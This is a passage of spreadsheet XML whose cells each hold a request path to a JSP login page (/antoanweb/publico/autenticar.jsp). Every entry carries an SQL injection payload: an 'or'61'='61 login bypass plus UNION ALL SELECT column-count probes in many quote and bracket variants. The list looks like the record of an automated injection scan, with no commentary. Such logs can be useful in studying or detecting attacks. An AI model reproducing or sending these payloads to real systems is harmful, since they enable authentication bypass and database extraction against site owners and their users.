  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830,830#and((('hfam'like'hfam&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138#and((('dukg'like'dukg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737,4737#and((('mvhs'like'mvhs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674,6674#and'zibs'like'zibs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473,4473#and'ckfd'like'ckfd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547,1547#and'pltx'like'pltx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120,4120#and'emtb'like'emtb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107#and'jjqp'like'jjqp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209,1209#and'cvce'like'cvce&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390,8390#and'efdr'like'efdr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430,6430#and'teis'like'teis&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515#and'spcb'like'spcb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395,5395#and'lorb'like'lorb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217,2217#and("ibbd"="ibbd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481,8481#and("dzjx"="dzjx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348,5348#and("zggy"="zggy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415,4415#and("jyrn"="jyrn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062,1062#and("rjtw"="rjtw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292#and("mtnk"="mtnk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210#and("xjpb"="xjpb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938,5938#and("ydgu"="ydgu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375,4375#and("tcok"="tcok&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486,486#and("vixl"="vixl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137,4137#and(("rvyl"="rvyl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321,8321#and(("jpqb"="jpqb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465,2465#and(("lpls"="lpls&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642,9642#and(("lpcm"="lpcm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454,8454#and(("hywy"="hywy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433,433#and(("cdgs"="cdgs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772,3772#and(("tmmd"="tmmd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571,1571#and(("kyng"="kyng&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539#and(("kjdn"="kjdn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961,1961#and(("jabs"="jabs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473,8473#and((("itmu"="itmu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561#and((("mzsl"="mzsl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149#and((("mggq"="mggq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330,2330#and((("dkol"="dkol&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874,8874#and((("esln"="esln&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939,4939#and((("mqmb"="mqmb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576#and((("wwix"="wwix&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653,4653#and((("demb"="demb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259,4259#and((("tjzf"="tjzf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738,4738#and((("tyhs"="tyhs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358,8358#and"dmya"="dmya&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173,9173#and"xmnf"="xmnf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380,380#and"avhr"="avhr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751,3751#and"fzgs"="fzgs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049#and"utma"="utma&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719,4719#and"qrxa"="qrxa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124,6124#and"riii"="riii&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319,9319#and"bfcp"="bfcp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312#and"wlaq"="wlaq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529,2529#and"tmvh"="tmvh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838,3838#and("hkfl"like"hkfl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859,3859#and("yiqp"like"yiqp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766#and("olgb"like"olgb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013,5013#and("xrin"like"xrin&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817#and("qavu"like"qavu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95#and("vwap"like"vwap&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973,973#and("crhv"like"crhv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545,9545#and("adih"like"adih&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327,5327#and("rlvp"like"rlvp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606,5606#and("lflj"like"lflj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145,1145#and(("lqtg"like"lqtg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202,1202#and(("mfmj"like"mfmj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638#and(("wmiv"like"wmiv&amp;modo=entrar</t>
  </si>
  <si>
